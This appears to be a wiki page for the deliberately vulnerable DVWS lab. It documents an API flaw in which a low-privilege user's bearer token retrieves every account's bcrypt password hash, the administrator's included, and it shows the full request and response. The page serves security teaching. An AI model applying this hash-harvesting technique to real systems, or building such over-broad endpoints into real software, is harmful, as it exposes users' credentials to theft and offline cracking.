Sensitive Data Exposure
Sam Sanoop edited this page Oct 31, 2021 · 1 revision
APIs often leak sensitive data through endpoints that return far more than the caller needs. In DVWS, any authenticated user can request the users API. The Bearer token in the request below belongs to the low-privilege `test` account: its payload decodes to `"user":"test"` with `permissions` of `user:read` and `user:write`, and carries no admin claim.
```http
GET /api/v2/users HTTP/1.1
Host: dvws.local
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json, text/plain, */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoidGVzdCIsInBlcm1pc3Npb25zIjpbInVzZXI6cmVhZCIsInVzZXI6d3JpdGUiXSwiaWF0IjoxNjM1NzE5NDU4LCJleHAiOjE2MzU4OTIyNTgsImlzcyI6Imh0dHBzOi8vZ2l0aHViLmNvbS9zbm9vcHlzZWN1cml0eSJ9.SSlXSXbYMMjRaS_nZ0jPmfL2VPAjmmIZrhC_uvcSnyA
Connection: close
Referer: http://dvws.local/notes.html
Content-Length: 1
```
The server answers with every user document verbatim, including each account's `admin` flag and bcrypt password hash (`$2b$10$...`). A non-admin user therefore obtains the administrator's hash and can attempt to crack it offline; nothing in the response is scoped to the caller.
```http
HTTP/1.1 200 OK
X-Powered-By: Express
Vary: Origin
Access-Control-Allow-Credentials: true
Cache-Control: no-store, no-cache, must-revalidate, private
Content-Type: application/json; charset=utf-8
Content-Length: 336
ETag: W/"150-Xw8+sEjh1vjh0KogCeUZCZSx51Q"
Date: Sun, 31 Oct 2021 22:36:46 GMT
Connection: close

{"status":200,"error":null,"result":[{"admin":true,"_id":"617f1824f47a696aa2253c3b","username":"admin","password":"$2b$10$IzyYy1Nu0E16SMjT7/erPuMvruixa5zx4UEkB.kRY3WbBfXakqBBm","__v":0},{"admin":false,"_id":"617f1824f47a696aa2253c3c","username":"test","password":"$2b$10$dvXrjBHMAp8XHtAMIxru8eagiPIavQrIS1jaoOtJgUEQbQJjyl80G","__v":0}]}
```